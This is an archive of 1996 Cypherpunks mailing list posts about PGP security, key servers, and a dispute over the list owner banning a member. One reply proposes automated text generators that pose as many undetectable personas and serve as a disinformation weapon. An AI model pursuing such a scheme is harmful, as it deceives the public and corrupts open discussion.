In-Reply-To: <Pine.SUN.3.91.961105123056.18719A-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.91.961106180519.8919A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Nov 1996, Sandy Sandfort wrote:

> 
> The English celebrate it because Guy Fawkes failed.
> 

Not just the English- it was James 1 that nearly exploded. Also 
the plot was performed for sectarian reasons, rather than any sort 
of liberal ideals (The conspirators were all Catholic).Originally
Bonfire Night was celebrated as a way of spreading and reinforcing
anti-catholicism. Those Whacky Christians!

Simon // It's not the rapture - we've sold you as meat to the Saucer People




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Wed, 6 Nov 1996 15:50:13 -0800 (PST)
To: "Edward R. Figueroa" <kb4vwa@juno.com>
Subject: Re: Information
In-Reply-To: <19961105.131710.5207.1.kb4vwa@juno.com>
Message-ID: <Pine.OSF.3.91.961106181407.23406I-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 5 Nov 1996, Edward R. Figueroa wrote:

> I'm a new Cyberpunk!   
> 
> I apologized if this is not the place to post this message request.
> 
> I have some interesting projects and questions for the Cyberpunk world.
> 
> I would like to know if there is any Cyberpunks in S. Florida (Miami) who
> could converse with me about Crypto?   I am very interested in making new
> Cyberpunk friends, meeting places,  etc.., or please send me E-mail.
> 
> I would like to know where to place my Public Key?   Note, I only have
> E-mail access at this time, and not the Net access, but could have a
> friend place the key for me.
> 
> Last,  I would like to know once and for all,  is PGP compromised,  is
> there a back door, and have we been fooled by NSA to believe it's
> secure?

As far as anyone knows that has publicly commented on it, PGP is presumed 
to be secure against known attacks.  By making the source code available, 
and basing the encryption on published methods - RSA and IDEA, PGP has 
been reviewed extensively by the world's experts on crypto, and those 
experts that publish their results have said there is no known easy way 
to crack it.  There are, of course, many experts who do not publish their 
results - for instance, cryptographers who work for intelligence 
gathering agencies.  What they have found out about RSA and IDEA the rest 
of us don't know.  There are efforts underway to prove mathematically how 
hard it is to break the sort of encryption that PGP is based on.

One thing to remember with PGP is that you must very carefully choose 
your pass phrase and keep it a secret.  If your pass phrase is easy to 
guess, then PGP won't offer you any real security.  Choose a long one, 
that is not composed of words likely to be found in dictionaries or 
published books, and memorize it.

Go to the library and get this book:

 _PGP: Pretty Good Privacy_,
by Simson Garfinkel, 
O'Reilly and Associates, Publishers
1995
ISBN 1-56592-098-8

If the library doesn't have it, ask the librarian to get for you by 
'Inter-Library Loan'.  If you still can't get it, try the library at one 
of the branch campuses of Miami-Dade Community College (MDCC) or Florida 
International University (FIU) on Tamiami Trail.  They should be able to 
help.

This is from the key server at MIT 
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html 
and explains the process for dealing with PGP key servers if all you have 
is e-mail access:

---<begin quoted material>---

PGP Public Email Keyservers
---------------------------

There are PGP public email key servers which allow one to exchange public
keys running using the Internet and UUCP mail systems.
Those capable of accessing the WWW might prefer to use the WWW interface
available via http://www.pgp.net/pgp/www-key.html and managers of sites
which may want to make frequent lookups may care to copy the full keyring
from the FTP server at ftp.pgp.net:pub/pgp/

This service exists only to help transfer keys between PGP users.
It does NOT attempt to guarantee that a key is a valid key;
use the signatures on a key for that kind of security.

Each keyserver processes requests in the form of mail messages.
The commands for the server are entered on the Subject: line.
---------------------------------------------- ======== -----
Note that they should NOT be included in the body of the message.
--------------------- === ---------------------------------------

        To: pgp-public-keys@keys.pgp.net
        From: johndoe@some.site.edu
        Subject: help

Sending your key to ONE server is enough.  After it processes your
key, it will forward your add request to other servers automagically.

For example, to add your key to the keyserver, or to update your key if it
is already there, send a message similar to the following to any server:

        To: pgp-public-keys@keys.pgp.net
        From: johndoe@some.site.edu
        Subject: add

        -----BEGIN PGP PUBLIC KEY BLOCK-----
        Version: 2.6

        
        -----END PGP PUBLIC KEY BLOCK-----

COMPROMISED KEYS:  Create a Key Revocation Certificate (read the PGP
docs on how to do that) and mail your key to the server once again,
with the ADD command.

Valid commands are:

Command                Message body contains
---------------------- -------------------------------------------------
ADD                    Your PGP public key (key to add is body of msg)
INDEX                  List all PGP keys the server knows about (-kv)
VERBOSE INDEX          List all PGP keys, verbose format (-kvv)
GET                    Get the whole public key ring (split)
GET userid             Get just that one key
MGET regexp            Get all keys which match /regexp/
                       regexp must be at least two characters long
LAST days              Get the keys updated in the last `days' days
------------------------------------------------------------------------

---<end of quoted material>---

--
pj

> 
> Ed - 
> 
> kb4vwa@juno.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Edwards <SAlanEd@concentric.net>
Date: Wed, 6 Nov 1996 16:57:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks
Message-ID: <1.5.4.32.19961107005911.006d4348@pop3.concentric.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:54 PM 11/3/96 -0500, you wrote:
>  Except it's not very effective, is it, since he's still
>posting flames?  In any case, it's an admission on John
>Gilmore's part that libertarianism can't work without some
>measure of authoritarianism; the only argument is over _just how
>much_ authoritarianism we need.
>  
>  I'm quite upset about this.  Up to now I was able to tell
>people that "there is at least one mailing list on the net that
>functions in a completely open manner".  No more.
>
>
>Will French  <wfrench@interport.net>

What has it got to do with libertarianism?  John Gilmore is not the
government, he just runs the list.  If we don't like what he does, we can
start a new list. I'm not sure that it was a good idea to remove Vulis, but
I don't believe that this single act reflects on any theory of governance. 

>
>
 

SAlanEd@concentric.net, SAlanEd@aol.com,
http://users.aol.com/salaned/cyberplace.html

"Life, he himself said once, (his biografiend, in fact, kills him verysoon,
if yet not, after) is a wake, livit or krikit, and on the bunk of our
breadwinning, lies the cropse of our seedfather..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Wed, 6 Nov 1996 16:06:27 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Re: UNSUBCRIBE CENSORSHIP
Message-ID: <199611070005.TAA36772@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: sintong@medan.wasantara.net.id, cypherpunks@toad.com,
 dlv@bwalk.dm.com
Date: Thu Nov 07 07:04:45 1996
That's it.

"UNSUBSCRIBE MISSPELLINGS!"
JMR   ^


Please note new 2000bit PGPkey & new address <jmr@shopmiami.com>
This key will be valid through election day 2000.
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71
Please avoid using old 1024bit PGPkey E9BD6D35 anymore. Thanks.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMoHQYzUhsGSn1j2pAQFylwfPT9bjSQBmF6SOpudeb2Zp8sg4peUrlfKw
Oj/JvwqwbbUHMovzu/NQl4JP1VzPbJRejNFxtNwSasIYV2ouO3YZqR8y+MhEsGU2
eYuhGoWCplSgtmUI+bloe9EX88L+qKkLLRxZUVeNG8WGsW/lM/gioZRTMGh9cGwc
zOtqEiw/DVZzryoEB1aFh/aCfcYR1sJwF/sATt62Tgn7R8Hk/OCXT8Ot4P7GXaeM
2AK4N4P9IPt4kQz/F8VVgsodEydpwSw51TB+npmkrSlIasq2Yw9K/gAhnlkd2DyH
64UFri7oH6kGRoVbn7XCTY3dGp6fRm2NGQ5okn5Rvds8ZA==
=jjAl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Black Knight <mixmaster@aldebaran.armory.com>
Date: Wed, 6 Nov 1996 19:13:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mixmaster Test
Message-ID: <9611061913.aa08554@aldebaran.armory.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the spam, folks ... just looking for a mixmaster that puts
the Subject: line into cypherpunk messages.

Name-Withheld-By-Request
Editor in Chief, Cypherpunk Enquirer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 6 Nov 1996 16:37:27 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: [NOISE] Re: Vulis profile
In-Reply-To: <199611061506.HAA17824@abraham.cs.berkeley.edu>
Message-ID: <Pine.SCO.3.93.961106191634.23586E-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Nov 1996, John Anonymous MacDonald wrote:

> I had some free time this morning, and just for fun, thought I'd 
> create a brief Net profile of our friend Dr. Vulis.  Here's what 
> I found (sources included):
<snip>
> Number of articles posted to individual newsgroups (slightly 
> skewed by cross-postings): 
<snip>
>           4 alt.sex.plushies 
<snip>


You gotta be kidding me.

People, let's just not even get this started - everyone, close your eyes,
take a few deep breathes, and repeat, "I'm not going to touch this - I'm
not going to touch this - I'm not going to touch this." 

There are, sometimes, some places that you just don't want to go,
ya know?

------------------------------------------------------------------------- 
|It's a small world and it smells bad     |        Mark Aldrich         |
|I'd buy another if I had                 |   GRCI INFOSEC Engineering  |
|Back                                     |     maldrich@grci.com       |
|What I paid                              | MAldrich@dockmaster.ncsc.mil|
|For another mother****er in a motorcade  |Quote from "Sisters of Mercy"|
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: linefeed@juno.com (Leon W Samson)
Date: Wed, 6 Nov 1996 18:08:27 -0800 (PST)
To: declan@eff.org
Subject: Re: Censorship in Western Australia
In-Reply-To: <Pine.SUN.3.91.961106044839.16537A-100000@eff.org>
Message-ID: <19961105.173739.9702.0.LineFeed@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


FUCK YOU ALL I WANT OFF OF THID MAILING LIS IT FUCKING SUCKS ALL IT DOES
IS FILL MY HDD WITH  JUNK MAIL DO YOU THINK I WANT THAT SHIT NO! I
DONT!!!!!!.....ALL YOU OF YOU ARE COOL BUT THIS THING SUCKS........SEE YA
COOL D00DS

				LineFeed


Leon Samson
A .K .A :  LineFeed
|-|ÉàÐ Òf þ¥(r)ÓTè(c)Hñì(c)§ Fò(r) ThÈ UHA
£íNËfèéÐ'§ p¥(r)ÒTé(c)|-|ñïx &  hÄ¢kÍñG þÂgë: 
http://www.geocities.com/CapeCanaveral/2015
LineFeed@juno.com                 LineFeed@geocities.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 6 Nov 1996 17:14:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Inquest?
In-Reply-To: <199611062232.RAA16407@spirit.hks.net>
Message-ID: <v03007807aea6e3e9479e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:32 pm -0500 11/6/96, Rich Graves wrote:

>Anyone who'd send this same text to both me and John Young hasn't been
>lurking very closely.

There's an echo in the room...

;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 6 Nov 1996 18:15:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: [MEDPOT] MedPot foundation scores important victory
Message-ID: <199611070212.UAA03568@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


http://www.cnn.com/US/9611/06/medical.marijuana/index.html

Marijuana proponents relish victory

               California attorney
               general predicts
               legal anarchy

               November 6, 1996
               Web posted at: 6:00 p.m. EST 

               From Correspondent Rusty
               Dornin 

               SAN FRANCISCO (CNN)
               -- Medical marijuana proponents celebrated their
               victory in Tuesday's elections with a ceremonial
               smoke. 

               "It's the will of the people," said Dennis Peron, an
               advocate for medical marijuana. "It is a mandate. It's
               about love and compassion about doing something
               that's concrete to help people who are sick and dying."

                                With the passage of the
                                proposition, people who are
                                sick and dying in California
                                and Arizona can smoke pot
                                legally if recommended by a
                                physician. While the two
                                states may say it's legal,
                                federal law still says 'no way'. 

               California's attorney general predicted the law change
               will lead to legal anarchy. "This thing is disastrous,"
               said Dan Lungren. "We're going to have an
               unprecedented mess." 

               Anyone suffering from AIDS and cancer to chronic
               pain and migraine headaches would be free to smoke
               pot under the new laws. 

               No written prescriptions are required. The passage of
               the proposition also means it's legal to grow pot for
               medicinal use. 

               That's exactly what worries
               Lungren. "We're going to have
               a hell of a time limiting
               marijuana use among young
               people in California at the very
               time that marijuana use is
               skyrocketing around the
               country," he said. 

               Medical pot proponents are setting their sights on the
               rest of the country, launching a national campaign,
               "Americans for medical rights," to focus on marijuana
               legislation in other states and on the federal level. 

               The news laws are expected to face court challenges in
               California. In any event, top nation drug enforcers said
               they will continue to enforce federal drug laws,
               including federal marijuana statutes. 

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 6 Nov 1996 17:20:03 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: list noise: a novel suggestion
In-Reply-To: <199611060322.TAA14388@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.94.961106201803.640A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Nov 1996, Vladimir Z. Nuri wrote:

> I read rants about the list noise on this list so much
> that it seems quite comical. it seems that everything
> else has been tried, I thought I would suggest something
> radically different.
> 
> I propose that no one talk about the noise on the list,
> on the list. pretend it doesn't exist. consider it
> like the weather: something that complaining about can do
> nothing about.

Who would reply to your messages?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 6 Nov 1996 17:21:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: ANO_mal
Message-ID: <1.5.4.32.19961107011948.006de8fc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-6-96. FiTi:

   "Anomalies across international borders"

   "I think there is a feeling that the UK's long history 
   of success in code-cracking makes the security services 
   confident about being able to break through any encryption
   scheme -- or use criminal law to enforce surrender of the
   key," Neil Barrett says. In his recent book, "The 
   State of the Cybernation", he examines cross-border
   encryption issues in greater detail.

   -----

   http://jya.com/anomal.txt

   ANO_mal









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pos Indonesia <sintong@medan.wasantara.net.id>
Date: Wed, 6 Nov 1996 04:29:25 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: UNSUBCRIBE CENSORSHIP
Message-ID: <37B84B5DF6@medan.wasantara.net.id>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE CENSORSHIP






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 6 Nov 1996 20:38:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Bay area cypherpunks meeting - Special Guest
Message-ID: <1.5.4.32.19961107043626.003b2bec@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


We will probably have a guest speaker from Intel at Saturday's meeting,
talking about:
>  Common Data Security Architecture (CDSA) a security infrastructure for 
>  managing crypto, certs, trust, etc.   Netscape chose 
>  CDSA about 2 weeks ago as the security infrastructure for Netscape 
>  communicator and suitespot servers. The press release can be found at 
>      http://www.netscape.com/newsref/pr/newsrelease268.html 




#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 6 Nov 1996 21:27:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mixmaster Test
Message-ID: <199611070509.VAA32474@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the spam, folks ... just looking for a mixmaster that puts
the Subject: line into cypherpunk messages.

Name-Withheld-By-Request
Editor in Chief, Cypherpunk Enquirer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 6 Nov 1996 21:14:49 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: [rant] Re: Censorship on cypherpunks
In-Reply-To: <3.0b36.32.19961106070051.00f0fd14@panix.com>
Message-ID: <32816F8E.6580@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> At 02:44 PM 11/5/96 -0800, Sean Roach wrote:
> >May I remind you that if you want to leave this country, all you have to do
> >is board a plane.  Many people have suggested similar things about various
> >groups for about two centuries.  The major difference between this list and
> >this government is that it is easier to start a new list.

> However since governments attempt to maintain a geographical monopoly and
> there are a very limited number of them, it is not possible to find another
> country you can enter as a matter of right so you may not be able to
> escape.  In contrast there are millions of private organizations of various
> sorts (corporations, etc) and it is trivial to find one to join if you like.

What both of these arguments (moreso the first) fail to mention is an individual's
investment in time and possibly a lot of money in various memberships, with expec-
tations that they will have the opportunity to develop and express themselves to
their utmost capability.  When I have a problem with some of the dirty things my
representatives in Washington DC do on my behalf, people say "like the U.S. or
leave it", etc., as though my father, his father, his father, etc. clear back to
the 1600's in the colonies here, wasted their blood on the battlefields defending
these assholes who like to say "you can just leave if you don't like it".

The squashing of people's dreams begins at birth with selfish and shortsighted parents,
and since that and other oppressions permeates our brains at every level, it's a wonder
that some people are as accomplished and expressive as they are.  This topic as it's
been handled so far by most of the subscribers is prima facie evidence that most of
the people in the industrialized countries are just good little suck-up fascists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 6 Nov 1996 19:24:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT] (fwd)
Message-ID: <199611070327.VAA10208@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

There is one important legal aspect which the operator of the Cypherpunks
mailing list has opened themselves up for with this action. In short they
have now opened themselves up for defamation and liable suites by imposing
an editorial policy on the contents of this list (1).

This opens up the potential, for example, for Tim May to sue the operator of
the Cypherpunks mailing list now for posts from users (even anonymous ones)
which defame or otherwise liable his character, reputation, or ability to
pursue income in his chosen field. In short the operators of the list
becomes publishers and distributors of the material. It is the legal
difference between a bookstore and a book publisher. 

Censorship is censorship, irrespective of the source of the limitation.
Free expression is impossible in an environment of censorship. The right to
speak not only implies a right to not speak, it also implies the right to
emit complete mumbo jumbo. The actual content of the speech is irrelevant.

The Constitution guarantees freedom of speech and press. This does not imply
in any way an abrogation of responsibility by the party speaking or
distributing it. Only that they would not have limitations on their actions
imposed by the federal government.

				ARTICLE I. 
 
	Congress shall make no law respecting an establishment of religion, 
or prohibiting the free exercise thereof; or abridging the freedom of 
speech, or of the press; or the right of the people peaceably to assemble, 
and to petition the Government for a redress of grievances. 

And just to make shure it is clear, the right to put something on the paper
(ie speech) is distinctly different from being the one doing the actual
printing.

I have argued in the past that this list is a defacto public list because of
the way it is advertised and to the extent it is advertised. All the protests
by the operator to the contrary will not convince a court.

Hope you folks have a good lawyer.

(1)  ;login:, Oct. 1996, V21N5, pp. 27


                                                    Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 6 Nov 1996 19:28:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vulis profile (fwd)
Message-ID: <199611070331.VAA10216@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 6 Nov 1996 05:57:54 +0100 (MET)
> Subject: Vulis profile
> From: nobody@replay.com (Anonymous)
> 
> He harasses people all over the net with the most offensive sorts 
> of messages, and uses dirty tricks to retaliate to the people who 
> do get offended. Among his accomplished feats is a series of 
> articles about cat-eating dogs posted to rec.pets.cats (which 
> caused a wave of complaints and made him lost his CUNY account) ; 
> a series of porno binaries with obscene comments about his 
> opponents posted to math-related newsgroups (he lost another 
> academic account, at fordham.edu, after this scandal); and a 
> series of racist articles denigrating all aspects of romanian 
> life and culture which used to haunt the romanian newsgroup for 
> years. 

Well it is nice to know that part of the system is working anyway....

                                           Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 6 Nov 1996 21:47:14 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <Pine.SUN.3.91.961106091938.3111C-100000@crl.crl.com>
Message-ID: <32817717.4CA6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> On Tue, 5 Nov 1996, Dale Thorn wrote:
> > My computer and my access to cypherpunks is not inside of anyone's home.

> Dale is wrong.  All access to Cypherpunks is via toad.com which
> sits in John Gilmore's home.  (The basement office to be exact.)

Wrongo, Mr./Mrs. Argumentum ad Nauseam.
My computer is in fact in MY home, and my access is SOLELY through GTE.

> > Here, John has opened up whatever computer hardware for an
> > essentially public forum...that it is perceived by a very
> > large segment of the subscribers as public...

> And here John has chosen to limit said forum.  It is irrelevant
> how many subscribers perceive the list as public.  It is private.
> Their misperception is in no way binding on John.

Perception is everything.  And I never made a comment about "binding" anything.
Therefore, there is no misunderstanding.

> > Now, don't you think it odd that if people really perceived
> > this forum to be "really private", that they would so strongly
> > object to this ousting, particularly of the person in question,
> > who is not even liked by these objectors?

> a) "Against stupidity, the gods themselve, contend in vain."
>    Some folks just don't have a clue.  Just because they don't
>    understand the nature of John's contribution, does not stop
>    them from yammering.

And the people who agree with you are the only intelligent/clueful people on this list?
Your contention is acknowledged and rejected.

> b) There are those who do understand the private nature of the
>    list, but think that John has made a mistake.  They may
>    certainly try to convince him of the error of his ways without
>    assuming the list is public.

The only fact you've shown to demonstrate that it's private is that John can manage it
"anyway he wants", and/or shut it down at will.  Well, the owners of Denny's can shut
their places down whenever they want to too.  Matter of fact, the whole government can
resign tomorrow and tell you to do it yourself.  Imagine what would happen in the L.A.
metro area if the truck drivers who bring in food decided they didn't want to do so
next week....

> > You can argue until doomsday the "privacy of home" issue,...

> Since it is correct and unasailable, I believe I will.

[snore]

> > If you really agree with the ousting, I don't understand why
> > you're arguing so hard for the "private home" issue; would you
> > want to see a world someday where all Internet communications
> > are "controlled" by "private" individuals at "home"?

> Yes.  That's the way it is now, and I think it works very well.

Works for you.  Which is all you care about.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 6 Nov 1996 21:57:21 -0800 (PST)
To: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Subject: Re: Information
In-Reply-To: <Pine.OSF.3.91.961106181407.23406I-100000@fn3.freenet.tlh.fl.us>
Message-ID: <328179E5.4C19@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


P. J. Ponder wrote:
> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
> > I'm a new Cyberpunk!
> > Last,  I would like to know once and for all,  is PGP compromised,  is
> > there a back door, and have we been fooled by NSA to believe it's secure?

> As far as anyone knows that has publicly commented on it, PGP is presumed
> to be secure against known attacks.  By making the source code available,
> and basing the encryption on published methods - RSA and IDEA, PGP has
> been reviewed extensively by the world's experts on crypto, and those
> experts that publish their results have said there is no known easy way
> to crack it.  There are, of course, many experts who do not publish their
> results - for instance, cryptographers who work for intelligence
> gathering agencies.  What they have found out about RSA and IDEA the rest
> of us don't know.  There are efforts underway to prove mathematically how
> hard it is to break the sort of encryption that PGP is based on.

[snippo]

Just to make it easy for you:  PGP will keep out your snoopy neighbors on the net, but
if you're betting it will lock out the government, you're probably peeing up the
proverbial rope.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 6 Nov 1996 19:17:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mixmaster Test
Message-ID: <9611070305.AA17841@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the spam, folks ... just looking for a mixmaster that puts
the Subject: line into cypherpunk messages.

Name-Withheld-By-Request
Editor in Chief, Cypherpunk Enquirer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 6 Nov 1996 22:15:22 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: "censorship in cyberspace"???
In-Reply-To: <199611052329.PAA15991@netcom22.netcom.com>
Message-ID: <32817E21.2F7E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
> I don't understand why people rant so much about censorship
> in cyberspace, given the ease of buying a new tentacle.

[snip]

> p.s. one of these days I wonder if someone is going to mount
> a really concerted attack against a mailing list using a
> full tentacle arsenal instead of only a single email address
> or anonymous remailers, just for the kicks of it.
> the "automatic prose generator" technology out there leaves a lot
> of other interesting ideas. an ingenious software engineer
> with a flair for writing could create some pretty sophisticated
> grammars that automatically generate text yet are impossible
> to detect over perhaps even dozens of messages output by them.
> they could even have their own personalities and writing styles,
> if the software engineer were creative and devious enough.

[snip]

It was suggested that concerned people would want to band together and defend against
this sort of thing.  I say, since the govt. and media (same thing) use heaps of this
stuff against us, and have been doing so for years, why doesn't some of that energy
being coordinated for "cracking" DES be turned into the same kind of disinformation
weapon described above, and used against the oppressors of the people?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 6 Nov 1996 22:24:24 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <32817717.4CA6@gte.net>
Message-ID: <Pine.SUN.3.91.961106215915.12243A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Dale seems to be getting over-wrought so I'll just hit the main
points.  On Wed, 6 Nov 1996, Dale Thorn wrote:

> Wrongo, Mr./Mrs. Argumentum ad Nauseam.
> My computer is in fact in MY home, and my access is SOLELY through GTE.

But access to Cypherpunks, the original issue in contention,
must pass through John's house.  Every string has two ends.

> The only fact you've shown to demonstrate that it's private is
> that John can manage it "anyway he wants", and/or shut it down
> at will. 

By George, I think he's got it!  Yes, the machine privately 
owned by John sits in John's private home, uses electricity and
net connection paid for by John.  (other then than, I guess I
havenpt made any other demonstration that it's private.  Duh.)

> Well, the owners of Denny's can shut their places down whenever
> they want to too. 

Yup.  And Dale's point is...?

> Matter of fact, the whole government can resign tomorrow and
> tell you to do it yourself. 

My wet dream.

> Imagine what would happen in the L.A. metro area if the truck
> drivers who bring in food decided they didn't want to do so
> next week....

That would be great!  We could all make a killing taking their 
place!  And Dale's point is...?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CHALAKKI@worldnet.att.net
Date: Wed, 6 Nov 1996 14:38:57 -0800 (PST)
To: Cypherpunks@toad.com
Subject: Cypherpunk mailing list
Message-ID: <19961106223742.AAH21546@IRON>
MIME-Version: 1.0
Content-Type: text/plain


Please put me on your mailing list





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 6 Nov 1996 22:38:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Who is "M"?
Message-ID: <Pine.3.89.9611062212.A11917-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


I met a person named "M" at Tim's party a month ago. Would somebody 
please email me some contact info?

Thanks,

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Wed, 6 Nov 1996 19:59:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Is there a Win PGP?
Message-ID: <961106225738_1182039548@emout03.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


subject says it all.... Im just wondering is (and where) there is a windows
version of PGP.. thanks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Wed, 6 Nov 1996 23:17:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mixtest
Message-ID: <199611070702.XAA04288@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the spam, folks ... just looking for a mixmaster that puts
the Subject: line into cypherpunk messages.

Name-Withheld-By-Request
Editor in Chief, Cypherpunk Enquirer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Wed, 6 Nov 1996 23:15:16 -0800 (PST)
To: cypherpunks@toad.com
